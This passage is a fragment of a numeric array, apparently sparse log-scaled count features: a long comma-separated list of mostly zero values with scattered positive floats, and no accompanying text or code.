0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 6.4641735942733005, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 2.6390573296152584, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 3.2188758248682006, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.4825185607408002, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.70805020110221, 0.0, \n 4.110873864173311, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.07753744390572, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 4.465908118654584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.6888794541139363, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8903717578961645, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 5.342334251964811, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 3.649511027115099, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.713572066704308, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.49053690687189, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, \n 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.828641396489095, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.8918202981106265, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.23410650459726, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.825453896395788, 0.0, 0,\n 0, 0.0, 0.0, 0, 0, 5.101797476893978, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2237778411112,\n 0, 0.0, 0.0, 0, 0.0, 0, 10.849972553336867, 0, 0.0, 0, \n 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 